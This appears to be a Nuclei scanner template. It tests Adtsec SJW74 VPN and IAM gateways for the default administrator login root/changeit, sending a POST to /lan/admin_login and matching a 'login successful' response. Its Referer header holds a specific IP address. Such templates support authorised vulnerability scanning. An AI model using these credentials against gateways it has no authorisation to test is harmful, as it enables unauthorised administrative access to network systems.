id: adtsec-vpn-default-login

info:
  name: 安达通SJW74VPN与IAM网关系统默认口令
  author: Str1am
  severity: high
  tags: adtsec,login

requests:
  - raw:
      - |
        POST /lan/admin_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: https://218.201.180.5:8888/login.html

        username=root&password=changeit&loginType=

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "登录成功"
        part: body
        condition: and